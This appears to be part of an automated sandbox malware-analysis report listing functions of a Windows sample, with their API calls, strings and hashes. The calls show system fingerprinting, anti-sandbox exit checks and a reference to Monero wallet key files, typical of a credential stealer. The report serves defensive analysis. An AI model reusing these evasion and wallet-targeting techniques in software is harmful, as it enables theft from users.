Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: a0fe9e5845c5bfdef8d78cd45a49231e3947d85ec5ae5cf5edc3a4a7abdf1b44
Instruction ID: b61c83cc69d7d5f37095cca449e130b8499fae93c8306c7a54d7164bcdc21ffc
Opcode Fuzzy Hash: a0fe9e5845c5bfdef8d78cd45a49231e3947d85ec5ae5cf5edc3a4a7abdf1b44
Instruction Fuzzy Hash: D421D87191021D9BDB24DB54DC85FE9B3B8FB48704F00C5E9A609A6240DE716A85CFE4

Function 00B97690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B976A4
RtlAllocateHeap.NTDLL(00000000), ref: 00B976AB
RegOpenKeyExA.KERNEL32(80000002,0132C460,00000000,00020119,00000000), ref: 00B976DD
RegQueryValueExA.KERNEL32(00000000,0133E298,00000000,00000000,?,000000FF), ref: 00B976FE
RegCloseKey.ADVAPI32(00000000), ref: 00B97708

Strings

Windows 11, xrefs: 00B976BD

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 263f56f8a6cfd4dd735ff3243c03dbd6f22a521722ff72bdc6a8e6566f1892da
Instruction ID: b905d8781ba9b6d4eae2a0773de8a3b204c8fe17283af36e14191d9b85d37711
Opcode Fuzzy Hash: 263f56f8a6cfd4dd735ff3243c03dbd6f22a521722ff72bdc6a8e6566f1892da
Instruction Fuzzy Hash: DF014FB5A5430ABBEB00DBE8DC4DF6AB7F8EB48705F104095FA04D7290DA7499048B61

Function 00B97720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B97734
RtlAllocateHeap.NTDLL(00000000), ref: 00B9773B
RegOpenKeyExA.KERNEL32(80000002,0132C460,00000000,00020119,00B976B9), ref: 00B9775B
RegQueryValueExA.KERNEL32(00B976B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00B9777A
RegCloseKey.ADVAPI32(00B976B9), ref: 00B97784

Strings

CurrentBuildNumber, xrefs: 00B97771

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: 99446527147a21b05776beebc2384aa88d3f87ed3026e91cae494a2a87b4b403
Instruction ID: e5c0fe3dffab388aa34e3e045782b6395d6b1a2f612339fd64bea44c0f8a1e31
Opcode Fuzzy Hash: 99446527147a21b05776beebc2384aa88d3f87ed3026e91cae494a2a87b4b403
Instruction Fuzzy Hash: B40117B5A4030EBBDB00DBE4DC49FAEB7B8EF44705F104595FA05E7391DA7459018B61

Function 00B940B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00B940D5
RegOpenKeyExA.KERNEL32(80000001,0133D920,00000000,00020119,?), ref: 00B940F4
RegQueryValueExA.ADVAPI32(?,0133E580,00000000,00000000,00000000,000000FF), ref: 00B94118
RegCloseKey.ADVAPI32(?), ref: 00B94122
lstrcat.KERNEL32(?,00000000), ref: 00B94147
lstrcat.KERNEL32(?,0133E550), ref: 00B9415B

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 1e59ae4e9ea52b2ea08cfa4ed679581f0558bc486043dac9d38ef82905ff7109
Instruction ID: f4cbf0a5bb263a4ab3ecf98757770a3ab4cb8eb808595d3a0f3f897da087b80a
Opcode Fuzzy Hash: 1e59ae4e9ea52b2ea08cfa4ed679581f0558bc486043dac9d38ef82905ff7109
Instruction Fuzzy Hash: 21418D76D0020DA7DB14FBA4EC46FFD737DAB58304F004998B619D6181EA755B888BF2

Function 00B969F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00B99860: GetProcAddress.KERNEL32(74DD0000,013323F8), ref: 00B998A1
Part of subcall function 00B99860: GetProcAddress.KERNEL32(74DD0000,01332188), ref: 00B998BA
Part of subcall function 00B99860: GetProcAddress.KERNEL32(74DD0000,01332170), ref: 00B998D2
Part of subcall function 00B99860: GetProcAddress.KERNEL32(74DD0000,01332218), ref: 00B998EA
Part of subcall function 00B99860: GetProcAddress.KERNEL32(74DD0000,01332278), ref: 00B99903
Part of subcall function 00B99860: GetProcAddress.KERNEL32(74DD0000,013390F0), ref: 00B9991B
Part of subcall function 00B99860: GetProcAddress.KERNEL32(74DD0000,01325870), ref: 00B99933
Part of subcall function 00B99860: GetProcAddress.KERNEL32(74DD0000,01325830), ref: 00B9994C
Part of subcall function 00B99860: GetProcAddress.KERNEL32(74DD0000,01332380), ref: 00B99964
Part of subcall function 00B99860: GetProcAddress.KERNEL32(74DD0000,013321A0), ref: 00B9997C
Part of subcall function 00B99860: GetProcAddress.KERNEL32(74DD0000,013322C0), ref: 00B99995
Part of subcall function 00B99860: GetProcAddress.KERNEL32(74DD0000,013321B8), ref: 00B999AD
Part of subcall function 00B99860: GetProcAddress.KERNEL32(74DD0000,01325730), ref: 00B999C5
Part of subcall function 00B99860: GetProcAddress.KERNEL32(74DD0000,013321D0), ref: 00B999DE

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B811D0: ExitProcess.KERNEL32 ref: 00B81211

Part of subcall function 00B81160: GetSystemInfo.KERNEL32(?), ref: 00B8116A
Part of subcall function 00B81160: ExitProcess.KERNEL32 ref: 00B8117E

Part of subcall function 00B81110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B8112B
Part of subcall function 00B81110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00B81132
Part of subcall function 00B81110: ExitProcess.KERNEL32 ref: 00B81143

Part of subcall function 00B81220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B8123E
Part of subcall function 00B81220: ExitProcess.KERNEL32 ref: 00B81294

Part of subcall function 00B96770: GetUserDefaultLangID.KERNEL32 ref: 00B96774

Part of subcall function 00B81190: ExitProcess.KERNEL32 ref: 00B811C6

Part of subcall function 00B97850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B811B7), ref: 00B97880
Part of subcall function 00B97850: RtlAllocateHeap.NTDLL(00000000), ref: 00B97887
Part of subcall function 00B97850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B9789F

Part of subcall function 00B978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B97910
Part of subcall function 00B978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00B97917
Part of subcall function 00B978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00B9792F

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01339100,?,00BA110C,?,00000000,?,00BA1110,?,00000000,00BA0AEF), ref: 00B96ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B96AE8
CloseHandle.KERNEL32(00000000), ref: 00B96AF9
Sleep.KERNEL32(00001770), ref: 00B96B04
CloseHandle.KERNEL32(?,00000000,?,01339100,?,00BA110C,?,00000000,?,00BA1110,?,00000000,00BA0AEF), ref: 00B96B1A
ExitProcess.KERNEL32 ref: 00B96B22

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2931873225-0
Opcode ID: 6ea0dc9bfa3a5323e304581677f0bbee923abdd9d70594e460dd62e233c23f91
Instruction ID: 8a2c275ced3051386875146d33c54a72e40c184fcb0862eba94173019638bcb1
Opcode Fuzzy Hash: 6ea0dc9bfa3a5323e304581677f0bbee923abdd9d70594e460dd62e233c23f91
Instruction Fuzzy Hash: 61310871950209AADF04FBF4DC9ABEE77F8AF05740F1045B8F202A2192EF706905C7A2

Function 00B899C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B899EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B89A11
LocalAlloc.KERNEL32(00000040,?), ref: 00B89A31
ReadFile.KERNEL32(000000FF,?,00000000,00B8148F,00000000), ref: 00B89A5A
LocalFree.KERNEL32(00B8148F), ref: 00B89A90
CloseHandle.KERNEL32(000000FF), ref: 00B89A9A

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 17b00f84eed0d068d82b9928fd863b682ca84be6b97f63f7db7bbf8bf4bc7c4c
Instruction ID: bf26c897953e563697cc7ff56d270004692a742bfa1a8675bd5b92de0aa92e11
Opcode Fuzzy Hash: 17b00f84eed0d068d82b9928fd863b682ca84be6b97f63f7db7bbf8bf4bc7c4c
Instruction Fuzzy Hash: 9E31D5B4A0020AEFDF14DF94C985BAE77F9FF48344F148198E911A72A0D774A941CFA1

Function 00B94780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0133E448), ref: 00B947DB

Part of subcall function 00B98DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B98E0B

lstrcat.KERNEL32(?,00000000), ref: 00B94801
lstrcat.KERNEL32(?,?), ref: 00B94820
lstrcat.KERNEL32(?,?), ref: 00B94834
lstrcat.KERNEL32(?,0132B868), ref: 00B94847
lstrcat.KERNEL32(?,?), ref: 00B9485B
lstrcat.KERNEL32(?,0133D740), ref: 00B9486F

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B98D90: GetFileAttributesA.KERNEL32(00000000,?,00B81B54,?,?,00BA564C,?,?,00BA0E1F), ref: 00B98D9F

Part of subcall function 00B94570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B94580
Part of subcall function 00B94570: RtlAllocateHeap.NTDLL(00000000), ref: 00B94587
Part of subcall function 00B94570: wsprintfA.USER32 ref: 00B945A6
Part of subcall function 00B94570: FindFirstFileA.KERNEL32(?,?), ref: 00B945BD

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 512efa95d8f16de3cf0779f858c728ed3ba70094c44600317e70dd12a09a17cb
